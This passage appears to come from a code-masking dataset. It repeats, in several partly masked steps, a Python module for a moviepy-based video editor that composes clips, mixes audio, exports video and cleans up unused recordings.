60\n if hour > 0:\n return '%d:%02d:%02d' % (hour, minutes, seconds)\n else:\n return '%02d:%02d' % (minutes, seconds)\n\n\n<mask token>\n\n\n@core.api\ndef include(file):\n with open(file, 'r', encoding='utf-8') as f:\n s = f.read()\n cwd = os.getcwd()\n os.chdir(os.path.dirname(os.path.abspath(file)))\n _parse_text(s)\n os.chdir(cwd)\n\n\ndef _remove_unused_recordings(s):\n used_recordings = set()\n unused_recordings = []\n apis = {'record': lambda f, **kargs: used_recordings.add(f)}\n _parse_text(s, apis=apis)\n files = [f for f in glob.glob('record/*') if os.path.isfile(f)]\n files = [f.replace('\\\\', '/') for f in files]\n for f in files:\n if f not in used_recordings:\n unused_recordings.append(f)\n print2('Used : %d' % len(used_recordings), color='green')\n print2('Unused : %d' % len(unused_recordings), color='red')\n assert len(used_recordings) + len(unused_recordings) == len(files)\n print('Press y to clean up: ', end='', flush=True)\n if getch() == 'y':\n for f in unused_recordings:\n try:\n os.remove(f)\n except:\n print('WARNING: failed to remove: %s' % f)\n\n\ndef _parse_text(text, apis=core.apis, **kwargs):\n\n def find_next(text, needle, p):\n pos = text.find(needle, p)\n if pos < 0:\n pos = len(text)\n return pos\n text = re.sub('<!--[\\\\d\\\\D]*?-->', '', text)\n p = 0\n while p < len(text):\n if text[p:p + 2] == '{{':\n end = find_next(text, '}}', p)\n python_code = text[p + 2:end].strip()\n p = end + 2\n if ignore_undefined:\n try:\n exec(python_code, apis)\n except NameError:\n pass\n else:\n exec(python_code, apis)\n continue\n if text[p:p + 1] == '#':\n end = find_next(text, '\\n', p)\n line = text[p:end].strip()\n _write_timestamp(coreapi.pos_dict['a'], line)\n p = end + 1\n continue\n match = re.match('---((?:[0-9]*[.])?[0-9]+)?\\n', text[p:])\n if match is not None:\n if match.group(1) is not None:\n coreapi.audio_gap(float(match.group(1)))\n else:\n coreapi.audio_gap(0.2)\n p += match.end(0) + 1\n continue\n end = find_next(text, '\\n', p)\n line = text[p:end].strip()\n p = end + 1\n if line != '' and 'parse_line' in apis:\n apis['parse_line'](line)\n core.on_api_func(None)\n\n\n<mask token>\n\n\ndef load_config():\n import yaml\n CONFIG_FILE = 'config.yaml'\n DEFAULT_CONFIG = {'fps': 30}\n if os.path.exists(CONFIG_FILE):\n with open(CONFIG_FILE, 'r') as f:\n config = yaml.load(f.read(), Loader=yaml.FullLoader)\n else:\n with open(CONFIG_FILE, 'w', newline='\\n') as f:\n yaml.dump(DEFAULT_CONFIG, f, default_flow_style=False)\n config = DEFAULT_CONFIG\n coreapi.fps(config['fps'])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef _update_mpy_clip(clip, subclip, speed, frame, norm, loop, duration, pos,\n scale, vol, **kwargs):\n assert duration is not None\n if subclip is not None:\n if isinstance(subclip, (int, float)):\n clip = clip.subclip(subclip).set_duration(duration)\n else:\n subclip_duration = subclip[1] - subclip[0]\n if duration > subclip_duration:\n c1 = clip.subclip(subclip[0], subclip[1])\n c2 = clip.to_ImageClip(subclip[1]).set_duration(duration -\n subclip_duration)\n clip = concatenate_videoclips([c1, c2])\n if clip.audio is not None:\n clip = clip.set_audio(clip.audio.set_fps(44100))\n else:\n clip = clip.subclip(subclip[0], subclip[1]).set_duration(\n duration)\n if speed is not None:\n clip = clip.fx(vfx.speedx, speed)\n if frame is not None:\n clip = clip.to_ImageClip(frame).set_duration(duration)\n if loop:\n clip = clip.fx(vfx.loop)\n if subclip is None:\n clip = clip.set_duration(duration)\n if pos is not None:\n if pos == 'center':\n clip = clip.set_position(('center', 'center'))\n elif isinstance(pos, (list, tuple)):\n pos = list(pos)\n half_size = [(x // 2) for x in clip.size]\n for i in range(2):\n if isinstance(pos[i], (int, float)):\n pos[i] = pos[i] - half_size[i]\n pos[i] = int(coreapi.global_scale * pos[i])\n clip = clip.set_position(pos)\n else:\n clip = clip.set_position(pos)\n if scale[0] != 1.0 or scale[1] != 1.0:\n clip = clip.resize((int(clip.w * scale[0]), int(clip.h * scale[1])))\n return clip\n\n\ndef _update_clip_duration(track):\n\n def is_connected(prev_clip, cur_clip):\n return math.isclose(prev_clip.start + prev_clip.duration, cur_clip.\n start, rel_tol=0.001)\n prev_clip_info = None\n for clip_info in track:\n if prev_clip_info is not None:\n if prev_clip_info.auto_extend:\n prev_clip_info.duration = (clip_info.start - prev_clip_info\n .start)\n prev_clip_info.auto_extend = False\n assert prev_clip_info.duration > 0\n if prev_clip_info.crossfade > 0 and not is_connected(prev_clip_info\n , clip_info):\n prev_clip_info.fadeout = prev_clip_info.crossfade\n prev_clip_info = clip_info\n if prev_clip_info is not None:\n if prev_clip_info.auto_extend:\n duration = prev_clip_info.duration\n if 're' in coreapi.pos_dict:\n duration = max(duration, coreapi.pos_dict['re'] - clip_info\n .start)\n prev_clip_info.duration = duration\n prev_clip_info.auto_extend = False\n if prev_clip_info.crossfade > 0:\n prev_clip_info.fadeout = prev_clip_info.crossfade\n\n\ndef _export_video(*, resolution, audio_only):\n resolution = [int(x * coreapi.global_scale) for x in resolution]\n audio_clips = []\n for track in datastruct.video_tracks.values():\n _update_clip_duration(track)\n video_clips = []\n for track_name, track in datastruct.video_tracks.items():\n for i, clip_info in enumerate(track):\n assert clip_info.mpy_clip is not None\n assert clip_info.duration is not None\n if clip_info.no_audio:\n clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)\n elif clip_info.mpy_clip.audio is not None:\n audio_clip = clip_info.mpy_clip.audio\n clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)\n if clip_info.subclip is not None:\n duration = clip_info.subclip[1] - clip_info.subclip[0]\n audio_clip = audio_clip.subclip(clip_info.subclip[0],\n clip_info.subclip[1])\n else:\n duration = clip_info.duration\n duration = min(duration, audio_clip.duration)\n audio_clip = audio_clip.set_duration(duration)\n audio_clip = audio_clip.set_start(clip_info.start)\n if clip_info.norm:\n audio_clip = audio_clip.fx(afx.audio_normalize)\n if clip_info.vol is not None:\n if isinstance(clip_info.vol, (int, float)):\n audio_clip = audio_clip.fx(afx.volumex, clip_info.vol)\n else:\n audio_clip = _adjust_mpy_audio_clip_volume(audio_clip,\n clip_info.vol)\n audio_clips.append(audio_clip)\n crossfade_duration = track[i + 1].crossfade if i < len(track\n ) - 1 else 0\n if crossfade_duration:\n clip_info.duration += crossfade_duration\n clip_info.mpy_clip = _update_mpy_clip(clip_info.mpy_clip, **\n vars(clip_info))\n if clip_info.fadein:\n assert isinstance(clip_info.fadein, (int, float))\n if track_name != 'vid':\n clip_info.mpy_clip = clip_info.mpy_clip.crossfadein(\n clip_info.fadein)\n else:\n clip_info.mpy_clip = clip_info.mpy_clip.fx(vfx.fadein,\n clip_info.fadein)\n elif clip_info.crossfade > 0:\n video_clips.append(clip_info.mpy_clip.set_duration(\n clip_info.crossfade).crossfadein(clip_info.crossfade).\n set_start(clip_info.start))\n clip_info.mpy_clip = clip_info.mpy_clip.subclip(clip_info.\n crossfade)\n clip_info.start += clip_info.crossfade\n if clip_info.fadeout:\n assert isinstance(clip_info.fadeout, (int, float))\n if track_name != 'vid':\n clip_info.mpy_clip = clip_info.mpy_clip.crossfadeout(\n clip_info.fadeout)\n else:\n clip_info.mpy_clip = clip_info.mpy_clip.fx(vfx.fadeout,\n clip_info.fadeout)\n video_clips.append(clip_info.mpy_clip.set_start(clip_info.start))\n if len(video_clips) == 0:\n video_clips.append(ColorClip((200, 200), color=(0, 1, 0)).\n set_duration(2))\n final_clip = CompositeVideoClip(video_clips, size=resolution)\n for _, track in datastruct.audio_tracks.items():\n clips = []\n for clip_info in track.clips:\n if clip_info.loop:\n clip = AudioFileClip(clip_info.file, buffersize=400000)\n else:\n clip = clip_info.mpy_clip\n if clip_info.subclip is not None:\n clip = clip.subclip(clip_info.subclip[0], clip_info.subclip[1])\n duration = clip_info.duration\n if duration is not None:\n if clip_info.loop:\n clip = clip.fx(afx.audio_loop, duration=duration)\n else:\n duration = min(duration, clip.duration)\n if clip_info.subclip:\n duration = min(duration, clip_info.subclip[1] -\n clip_info.subclip[0])\n clip = clip.set_duration(duration)\n if clip_info.start is not None:\n clip = clip.set_start(clip_info.start)\n if len(clip_info.vol_keypoints) > 0:\n clip = _adjust_mpy_audio_clip_volume(clip, clip_info.\n vol_keypoints)\n clips.append(clip)\n if len(clips) > 0:\n clip = CompositeAudioClip(clips)\n audio_clips.append(clip)\n if final_clip.audio:\n audio_clips.append(final_clip.audio)\n if len(audio_clips) > 0:\n final_audio_clip = CompositeAudioClip(audio_clips)\n final_clip = final_clip.set_audio(final_audio_clip)\n os.makedirs('tmp/out', exist_ok=True)\n if audio_only:\n final_audio_clip.fps = 44100\n final_audio_clip.write_audiofile('%s.mp3' % out_filename)\n open_with('%s.mp3' % out_filename, program_id=0)\n else:\n final_clip.write_videofile('%s.mp4' % out_filename, temp_audiofile=\n '%s.mp3' % out_filename, remove_temp=False, codec='libx264',\n threads=8, fps=coreapi.FPS, ffmpeg_params=['-crf', '19'])\n subprocess.Popen(['mpv', '--force-window', '--geometry=1920x1080',\n f'{out_filename}.mp4'], close_fds=True)\n\n\ndef _adjust_mpy_audio_clip_volume(clip, vol_keypoints):\n xp = []\n fp = []\n print('vol_keypoints:', vol_keypoints)\n for p, vol in vol_keypoints:\n if isinstance(vol, (int, float)):\n xp.append(p)\n fp.append(vol)\n else:\n raise Exception('unsupported bgm parameter type:' % type(vol))\n\n def volume_adjust(gf, t):\n factor = np.interp(t, xp, fp)\n factor = np.vstack([factor, factor]).T\n return factor * gf(t)\n return clip.fl(volume_adjust)\n\n\ndef _convert_to_readable_time(seconds):\n seconds = int(seconds)\n seconds = seconds % (24 * 3600)\n hour = seconds // 3600\n seconds %= 3600\n minutes = seconds // 60\n seconds %= 60\n if hour > 0:\n return '%d:%02d:%02d' % (hour, minutes, seconds)\n else:\n return '%02d:%02d' % (minutes, seconds)\n\n\n<mask token>\n\n\n@core.api\ndef include(file):\n with open(file, 'r', encoding='utf-8') as f:\n s = f.read()\n cwd = os.getcwd()\n os.chdir(os.path.dirname(os.path.abspath(file)))\n _parse_text(s)\n os.chdir(cwd)\n\n\ndef _remove_unused_recordings(s):\n used_recordings = set()\n unused_recordings = []\n apis = {'record': lambda f, **kargs: used_recordings.add(f)}\n _parse_text(s, apis=apis)\n files = [f for f in glob.glob('record/*') if os.path.isfile(f)]\n files = [f.replace('\\\\', '/') for f in files]\n for f in files:\n if f not in used_recordings:\n unused_recordings.append(f)\n print2('Used : %d' % len(used_recordings), color='green')\n print2('Unused : %d' % len(unused_recordings), color='red')\n assert len(used_recordings) + len(unused_recordings) == len(files)\n print('Press y to clean up: ', end='', flush=True)\n if getch() == 'y':\n for f in unused_recordings:\n try:\n os.remove(f)\n except:\n print('WARNING: failed to remove: %s' % f)\n\n\ndef _parse_text(text, apis=core.apis, **kwargs):\n\n def find_next(text, needle, p):\n pos = text.find(needle, p)\n if pos < 0:\n pos = len(text)\n return pos\n text = re.sub('<!--[\\\\d\\\\D]*?-->', '', text)\n p = 0\n while p < len(text):\n if text[p:p + 2] == '{{':\n end = find_next(text, '}}', p)\n python_code = text[p + 2:end].strip()\n p = end + 2\n if ignore_undefined:\n try:\n exec(python_code, apis)\n except NameError:\n pass\n else:\n exec(python_code, apis)\n continue\n if text[p:p + 1] == '#':\n end = find_next(text, '\\n', p)\n line = text[p:end].strip()\n _write_timestamp(coreapi.pos_dict['a'], line)\n p = end + 1\n continue\n match = re.match('---((?:[0-9]*[.])?[0-9]+)?\\n', text[p:])\n if match is not None:\n if match.group(1) is not None:\n coreapi.audio_gap(float(match.group(1)))\n else:\n coreapi.audio_gap(0.2)\n p += match.end(0) + 1\n continue\n end = find_next(text, '\\n', p)\n line = text[p:end].strip()\n p = end + 1\n if line != '' and 'parse_line' in apis:\n apis['parse_line'](line)\n core.on_api_func(None)\n\n\n<mask token>\n\n\ndef load_config():\n import yaml\n CONFIG_FILE = 'config.yaml'\n DEFAULT_CONFIG = {'fps': 30}\n if os.path.exists(CONFIG_FILE):\n with open(CONFIG_FILE, 'r') as f:\n config = yaml.load(f.read(), Loader=yaml.FullLoader)\n else:\n with open(CONFIG_FILE, 'w', newline='\\n') as f:\n yaml.dump(DEFAULT_CONFIG, f, default_flow_style=False)\n config = DEFAULT_CONFIG\n coreapi.fps(config['fps'])\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef _update_mpy_clip(clip, subclip, speed, frame, norm, loop, duration, pos,\n scale, vol, **kwargs):\n assert duration is not None\n if subclip is not None:\n if isinstance(subclip, (int, float)):\n clip = clip.subclip(subclip).set_duration(duration)\n else:\n subclip_duration = subclip[1] - subclip[0]\n if duration > subclip_duration:\n c1 = clip.subclip(subclip[0], subclip[1])\n c2 = clip.to_ImageClip(subclip[1]).set_duration(duration -\n subclip_duration)\n clip = concatenate_videoclips([c1, c2])\n if clip.audio is not None:\n clip = clip.set_audio(clip.audio.set_fps(44100))\n else:\n clip = clip.subclip(subclip[0], subclip[1]).set_duration(\n duration)\n if speed is not None:\n clip = clip.fx(vfx.speedx, speed)\n if frame is not None:\n clip = clip.to_ImageClip(frame).set_duration(duration)\n if loop:\n clip = clip.fx(vfx.loop)\n if subclip is None:\n clip = clip.set_duration(duration)\n if pos is not None:\n if pos == 'center':\n clip = clip.set_position(('center', 'center'))\n elif isinstance(pos, (list, tuple)):\n pos = list(pos)\n half_size = [(x // 2) for x in clip.size]\n for i in range(2):\n if isinstance(pos[i], (int, float)):\n pos[i] = pos[i] - half_size[i]\n pos[i] = int(coreapi.global_scale * pos[i])\n clip = clip.set_position(pos)\n else:\n clip = clip.set_position(pos)\n if scale[0] != 1.0 or scale[1] != 1.0:\n clip = clip.resize((int(clip.w * scale[0]), int(clip.h * scale[1])))\n return clip\n\n\ndef _update_clip_duration(track):\n\n def is_connected(prev_clip, cur_clip):\n return math.isclose(prev_clip.start + prev_clip.duration, cur_clip.\n start, rel_tol=0.001)\n prev_clip_info = None\n for clip_info in track:\n if prev_clip_info is not None:\n if prev_clip_info.auto_extend:\n prev_clip_info.duration = (clip_info.start - prev_clip_info\n .start)\n prev_clip_info.auto_extend = False\n assert prev_clip_info.duration > 0\n if prev_clip_info.crossfade > 0 and not is_connected(prev_clip_info\n , clip_info):\n prev_clip_info.fadeout = prev_clip_info.crossfade\n prev_clip_info = clip_info\n if prev_clip_info is not None:\n if prev_clip_info.auto_extend:\n duration = prev_clip_info.duration\n if 're' in coreapi.pos_dict:\n duration = max(duration, coreapi.pos_dict['re'] - clip_info\n .start)\n prev_clip_info.duration = duration\n prev_clip_info.auto_extend = False\n if prev_clip_info.crossfade > 0:\n prev_clip_info.fadeout = prev_clip_info.crossfade\n\n\ndef _export_video(*, resolution, audio_only):\n resolution = [int(x * coreapi.global_scale) for x in resolution]\n audio_clips = []\n for track in datastruct.video_tracks.values():\n _update_clip_duration(track)\n video_clips = []\n for track_name, track in datastruct.video_tracks.items():\n for i, clip_info in enumerate(track):\n assert clip_info.mpy_clip is not None\n assert clip_info.duration is not None\n if clip_info.no_audio:\n clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)\n elif clip_info.mpy_clip.audio is not None:\n audio_clip = clip_info.mpy_clip.audio\n clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)\n if clip_info.subclip is not None:\n duration = clip_info.subclip[1] - clip_info.subclip[0]\n audio_clip = audio_clip.subclip(clip_info.subclip[0],\n clip_info.subclip[1])\n else:\n duration = clip_info.duration\n duration = min(duration, audio_clip.duration)\n audio_clip = audio_clip.set_duration(duration)\n audio_clip = audio_clip.set_start(clip_info.start)\n if clip_info.norm:\n audio_clip = audio_clip.fx(afx.audio_normalize)\n if clip_info.vol is not None:\n if isinstance(clip_info.vol, (int, float)):\n audio_clip = audio_clip.fx(afx.volumex, clip_info.vol)\n else:\n audio_clip = _adjust_mpy_audio_clip_volume(audio_clip,\n clip_info.vol)\n audio_clips.append(audio_clip)\n crossfade_duration = track[i + 1].crossfade if i < len(track\n ) - 1 else 0\n if crossfade_duration:\n clip_info.duration += crossfade_duration\n clip_info.mpy_clip = _update_mpy_clip(clip_info.mpy_clip, **\n vars(clip_info))\n if clip_info.fadein:\n assert isinstance(clip_info.fadein, (int, float))\n if track_name != 'vid':\n clip_info.mpy_clip = clip_info.mpy_clip.crossfadein(\n clip_info.fadein)\n else:\n clip_info.mpy_clip = clip_info.mpy_clip.fx(vfx.fadein,\n clip_info.fadein)\n elif clip_info.crossfade > 0:\n video_clips.append(clip_info.mpy_clip.set_duration(\n clip_info.crossfade).crossfadein(clip_info.crossfade).\n set_start(clip_info.start))\n clip_info.mpy_clip = clip_info.mpy_clip.subclip(clip_info.\n crossfade)\n clip_info.start += clip_info.crossfade\n if clip_info.fadeout:\n assert isinstance(clip_info.fadeout, (int, float))\n if track_name != 'vid':\n clip_info.mpy_clip = clip_info.mpy_clip.crossfadeout(\n clip_info.fadeout)\n else:\n clip_info.mpy_clip = clip_info.mpy_clip.fx(vfx.fadeout,\n clip_info.fadeout)\n video_clips.append(clip_info.mpy_clip.set_start(clip_info.start))\n if len(video_clips) == 0:\n video_clips.append(ColorClip((200, 200), color=(0, 1, 0)).\n set_duration(2))\n final_clip = CompositeVideoClip(video_clips, size=resolution)\n for _, track in datastruct.audio_tracks.items():\n clips = []\n for clip_info in track.clips:\n if clip_info.loop:\n clip = AudioFileClip(clip_info.file, buffersize=400000)\n else:\n clip = clip_info.mpy_clip\n if clip_info.subclip is not None:\n clip = clip.subclip(clip_info.subclip[0], clip_info.subclip[1])\n duration = clip_info.duration\n if duration is not None:\n if clip_info.loop:\n clip = clip.fx(afx.audio_loop, duration=duration)\n else:\n duration = min(duration, clip.duration)\n if clip_info.subclip:\n duration = min(duration, clip_info.subclip[1] -\n clip_info.subclip[0])\n clip = clip.set_duration(duration)\n if clip_info.start is not None:\n clip = clip.set_start(clip_info.start)\n if len(clip_info.vol_keypoints) > 0:\n clip = _adjust_mpy_audio_clip_volume(clip, clip_info.\n vol_keypoints)\n clips.append(clip)\n if len(clips) > 0:\n clip = CompositeAudioClip(clips)\n audio_clips.append(clip)\n if final_clip.audio:\n audio_clips.append(final_clip.audio)\n if len(audio_clips) > 0:\n final_audio_clip = CompositeAudioClip(audio_clips)\n final_clip = final_clip.set_audio(final_audio_clip)\n os.makedirs('tmp/out', exist_ok=True)\n if audio_only:\n final_audio_clip.fps = 44100\n final_audio_clip.write_audiofile('%s.mp3' % out_filename)\n open_with('%s.mp3' % out_filename, program_id=0)\n else:\n final_clip.write_videofile('%s.mp4' % out_filename, temp_audiofile=\n '%s.mp3' % out_filename, remove_temp=False, codec='libx264',\n threads=8, fps=coreapi.FPS, ffmpeg_params=['-crf', '19'])\n subprocess.Popen(['mpv', '--force-window', '--geometry=1920x1080',\n f'{out_filename}.mp4'], close_fds=True)\n\n\ndef _adjust_mpy_audio_clip_volume(clip, vol_keypoints):\n xp = []\n fp = []\n print('vol_keypoints:', vol_keypoints)\n for p, vol in vol_keypoints:\n if isinstance(vol, (int, float)):\n xp.append(p)\n fp.append(vol)\n else:\n raise Exception('unsupported bgm parameter type:' % type(vol))\n\n def volume_adjust(gf, t):\n factor = np.interp(t, xp, fp)\n factor = np.vstack([factor, factor]).T\n return factor * gf(t)\n return clip.fl(volume_adjust)\n\n\ndef _convert_to_readable_time(seconds):\n seconds = int(seconds)\n seconds = seconds % (24 * 3600)\n hour = seconds // 3600\n seconds %= 3600\n minutes = seconds // 60\n seconds %= 60\n if hour > 0:\n return '%d:%02d:%02d' % (hour, minutes, seconds)\n else:\n return '%02d:%02d' % (minutes, seconds)\n\n\ndef _write_timestamp(t, section_name):\n os.makedirs(os.path.dirname(out_filename), exist_ok=True)\n if not hasattr(_write_timestamp, 'f'):\n _write_timestamp.f = open('%s.txt' % out_filename, 'w', encoding=\n 'utf-8')\n _write_timestamp.f.write('%s (%s)\\n' % (section_name,\n _convert_to_readable_time(t)))\n _write_timestamp.f.flush()\n\n\n@core.api\ndef include(file):\n with open(file, 'r', encoding='utf-8') as f:\n s = f.read()\n cwd = os.getcwd()\n os.chdir(os.path.dirname(os.path.abspath(file)))\n _parse_text(s)\n os.chdir(cwd)\n\n\ndef _remove_unused_recordings(s):\n used_recordings = set()\n unused_recordings = []\n apis = {'record': lambda f, **kargs: used_recordings.add(f)}\n _parse_text(s, apis=apis)\n files = [f for f in glob.glob('record/*') if os.path.isfile(f)]\n files = [f.replace('\\\\', '/') for f in files]\n for f in files:\n if f not in used_recordings:\n unused_recordings.append(f)\n print2('Used : %d' % len(used_recordings), color='green')\n print2('Unused : %d' % len(unused_recordings), color='red')\n assert len(used_recordings) + len(unused_recordings) == len(files)\n print('Press y to clean up: ', end='', flush=True)\n if getch() == 'y':\n for f in unused_recordings:\n try:\n os.remove(f)\n except:\n print('WARNING: failed to remove: %s' % f)\n\n\ndef _parse_text(text, apis=core.apis, **kwargs):\n\n def find_next(text, needle, p):\n pos = text.find(needle, p)\n if pos < 0:\n pos = len(text)\n return pos\n text = re.sub('<!--[\\\\d\\\\D]*?-->', '', text)\n p = 0\n while p < len(text):\n if text[p:p + 2] == '{{':\n end = find_next(text, '}}', p)\n python_code = text[p + 2:end].strip()\n p = end + 2\n if ignore_undefined:\n try:\n exec(python_code, apis)\n except NameError:\n pass\n else:\n exec(python_code, apis)\n continue\n if text[p:p + 1] == '#':\n end = find_next(text, '\\n', p)\n line = text[p:end].strip()\n _write_timestamp(coreapi.pos_dict['a'], line)\n p = end + 1\n continue\n match = re.match('---((?:[0-9]*[.])?[0-9]+)?\\n', text[p:])\n if match is not None:\n if match.group(1) is not None:\n coreapi.audio_gap(float(match.group(1)))\n else:\n coreapi.audio_gap(0.2)\n p += match.end(0) + 1\n continue\n end = find_next(text, '\\n', p)\n line = text[p:end].strip()\n p = end + 1\n if line != '' and 'parse_line' in apis:\n apis['parse_line'](line)\n core.on_api_func(None)\n\n\n<mask token>\n\n\ndef load_config():\n import yaml\n CONFIG_FILE = 'config.yaml'\n DEFAULT_CONFIG = {'fps': 30}\n if os.path.exists(CONFIG_FILE):\n with open(CONFIG_FILE, 'r') as f:\n config = yaml.load(f.read(), Loader=yaml.FullLoader)\n else:\n with open(CONFIG_FILE, 'w', newline='\\n') as f:\n yaml.dump(DEFAULT_CONFIG, f, default_flow_style=False)\n config = DEFAULT_CONFIG\n coreapi.fps(config['fps'])\n\n\n<mask token>\n",
"step-4": "<mask token>\nif 1:\n change_settings({'FFMPEG_BINARY': get_executable('ffmpeg')})\n\n\ndef _update_mpy_clip(clip, subclip, speed, frame, norm, loop, duration, pos,\n scale, vol, **kwargs):\n assert duration is not None\n if subclip is not None:\n if isinstance(subclip, (int, float)):\n clip = clip.subclip(subclip).set_duration(duration)\n else:\n subclip_duration = subclip[1] - subclip[0]\n if duration > subclip_duration:\n c1 = clip.subclip(subclip[0], subclip[1])\n c2 = clip.to_ImageClip(subclip[1]).set_duration(duration -\n subclip_duration)\n clip = concatenate_videoclips([c1, c2])\n if clip.audio is not None:\n clip = clip.set_audio(clip.audio.set_fps(44100))\n else:\n clip = clip.subclip(subclip[0], subclip[1]).set_duration(\n duration)\n if speed is not None:\n clip = clip.fx(vfx.speedx, speed)\n if frame is not None:\n clip = clip.to_ImageClip(frame).set_duration(duration)\n if loop:\n clip = clip.fx(vfx.loop)\n if subclip is None:\n clip = clip.set_duration(duration)\n if pos is not None:\n if pos == 'center':\n clip = clip.set_position(('center', 'center'))\n elif isinstance(pos, (list, tuple)):\n pos = list(pos)\n half_size = [(x // 2) for x in clip.size]\n for i in range(2):\n if isinstance(pos[i], (int, float)):\n pos[i] = pos[i] - half_size[i]\n pos[i] = int(coreapi.global_scale * pos[i])\n clip = clip.set_position(pos)\n else:\n clip = clip.set_position(pos)\n if scale[0] != 1.0 or scale[1] != 1.0:\n clip = clip.resize((int(clip.w * scale[0]), int(clip.h * scale[1])))\n return clip\n\n\ndef _update_clip_duration(track):\n\n def is_connected(prev_clip, cur_clip):\n return math.isclose(prev_clip.start + prev_clip.duration, cur_clip.\n start, rel_tol=0.001)\n prev_clip_info = None\n for clip_info in track:\n if prev_clip_info is not None:\n if prev_clip_info.auto_extend:\n prev_clip_info.duration = (clip_info.start - prev_clip_info\n .start)\n prev_clip_info.auto_extend = False\n assert prev_clip_info.duration > 0\n if prev_clip_info.crossfade > 0 and not is_connected(prev_clip_info\n , clip_info):\n prev_clip_info.fadeout = prev_clip_info.crossfade\n prev_clip_info = clip_info\n if prev_clip_info is not None:\n if prev_clip_info.auto_extend:\n duration = prev_clip_info.duration\n if 're' in coreapi.pos_dict:\n duration = max(duration, coreapi.pos_dict['re'] - clip_info\n .start)\n prev_clip_info.duration = duration\n prev_clip_info.auto_extend = False\n if prev_clip_info.crossfade > 0:\n prev_clip_info.fadeout = prev_clip_info.crossfade\n\n\ndef _export_video(*, resolution, audio_only):\n resolution = [int(x * coreapi.global_scale) for x in resolution]\n audio_clips = []\n for track in datastruct.video_tracks.values():\n _update_clip_duration(track)\n video_clips = []\n for track_name, track in datastruct.video_tracks.items():\n for i, clip_info in enumerate(track):\n assert clip_info.mpy_clip is not None\n assert clip_info.duration is not None\n if clip_info.no_audio:\n clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)\n elif clip_info.mpy_clip.audio is not None:\n audio_clip = clip_info.mpy_clip.audio\n clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)\n if clip_info.subclip is not None:\n duration = clip_info.subclip[1] - clip_info.subclip[0]\n audio_clip = audio_clip.subclip(clip_info.subclip[0],\n clip_info.subclip[1])\n else:\n duration = clip_info.duration\n duration = min(duration, audio_clip.duration)\n audio_clip = audio_clip.set_duration(duration)\n audio_clip = audio_clip.set_start(clip_info.start)\n if clip_info.norm:\n audio_clip = audio_clip.fx(afx.audio_normalize)\n if clip_info.vol is not None:\n if isinstance(clip_info.vol, (int, float)):\n audio_clip = audio_clip.fx(afx.volumex, clip_info.vol)\n else:\n audio_clip = _adjust_mpy_audio_clip_volume(audio_clip,\n clip_info.vol)\n audio_clips.append(audio_clip)\n crossfade_duration = track[i + 1].crossfade if i < len(track\n ) - 1 else 0\n if crossfade_duration:\n clip_info.duration += crossfade_duration\n clip_info.mpy_clip = _update_mpy_clip(clip_info.mpy_clip, **\n vars(clip_info))\n if clip_info.fadein:\n assert isinstance(clip_info.fadein, (int, float))\n if track_name != 'vid':\n clip_info.mpy_clip = clip_info.mpy_clip.crossfadein(\n clip_info.fadein)\n else:\n clip_info.mpy_clip = clip_info.mpy_clip.fx(vfx.fadein,\n clip_info.fadein)\n elif clip_info.crossfade > 0:\n video_clips.append(clip_info.mpy_clip.set_duration(\n clip_info.crossfade).crossfadein(clip_info.crossfade).\n set_start(clip_info.start))\n clip_info.mpy_clip = clip_info.mpy_clip.subclip(clip_info.\n crossfade)\n clip_info.start += clip_info.crossfade\n if clip_info.fadeout:\n assert isinstance(clip_info.fadeout, (int, float))\n if track_name != 'vid':\n clip_info.mpy_clip = clip_info.mpy_clip.crossfadeout(\n clip_info.fadeout)\n else:\n clip_info.mpy_clip = clip_info.mpy_clip.fx(vfx.fadeout,\n clip_info.fadeout)\n video_clips.append(clip_info.mpy_clip.set_start(clip_info.start))\n if len(video_clips) == 0:\n video_clips.append(ColorClip((200, 200), color=(0, 1, 0)).\n set_duration(2))\n final_clip = CompositeVideoClip(video_clips, size=resolution)\n for _, track in datastruct.audio_tracks.items():\n clips = []\n for clip_info in track.clips:\n if clip_info.loop:\n clip = AudioFileClip(clip_info.file, buffersize=400000)\n else:\n clip = clip_info.mpy_clip\n if clip_info.subclip is not None:\n clip = clip.subclip(clip_info.subclip[0], clip_info.subclip[1])\n duration = clip_info.duration\n if duration is not None:\n if clip_info.loop:\n clip = clip.fx(afx.audio_loop, duration=duration)\n else:\n duration = min(duration, clip.duration)\n if clip_info.subclip:\n duration = min(duration, clip_info.subclip[1] -\n clip_info.subclip[0])\n clip = clip.set_duration(duration)\n if clip_info.start is not None:\n clip = clip.set_start(clip_info.start)\n if len(clip_info.vol_keypoints) > 0:\n clip = _adjust_mpy_audio_clip_volume(clip, clip_info.\n vol_keypoints)\n clips.append(clip)\n if len(clips) > 0:\n clip = CompositeAudioClip(clips)\n audio_clips.append(clip)\n if final_clip.audio:\n audio_clips.append(final_clip.audio)\n if len(audio_clips) > 0:\n final_audio_clip = CompositeAudioClip(audio_clips)\n final_clip = final_clip.set_audio(final_audio_clip)\n os.makedirs('tmp/out', exist_ok=True)\n if audio_only:\n final_audio_clip.fps = 44100\n final_audio_clip.write_audiofile('%s.mp3' % out_filename)\n open_with('%s.mp3' % out_filename, program_id=0)\n else:\n final_clip.write_videofile('%s.mp4' % out_filename, temp_audiofile=\n '%s.mp3' % out_filename, remove_temp=False, codec='libx264',\n threads=8, fps=coreapi.FPS, ffmpeg_params=['-crf', '19'])\n subprocess.Popen(['mpv', '--force-window', '--geometry=1920x1080',\n f'{out_filename}.mp4'], close_fds=True)\n\n\ndef _adjust_mpy_audio_clip_volume(clip, vol_keypoints):\n xp = []\n fp = []\n print('vol_keypoints:', vol_keypoints)\n for p, vol in vol_keypoints:\n if isinstance(vol, (int, float)):\n xp.append(p)\n fp.append(vol)\n else:\n raise Exception('unsupported bgm parameter type:' % type(vol))\n\n def volume_adjust(gf, t):\n factor = np.interp(t, xp, fp)\n factor = np.vstack([factor, factor]).T\n return factor * gf(t)\n return clip.fl(volume_adjust)\n\n\ndef _convert_to_readable_time(seconds):\n seconds = int(seconds)\n seconds = seconds % (24 * 3600)\n hour = seconds // 3600\n seconds %= 3600\n minutes = seconds // 60\n seconds %= 60\n if hour > 0:\n return '%d:%02d:%02d' % (hour, minutes, seconds)\n else:\n return '%02d:%02d' % (minutes, seconds)\n\n\ndef 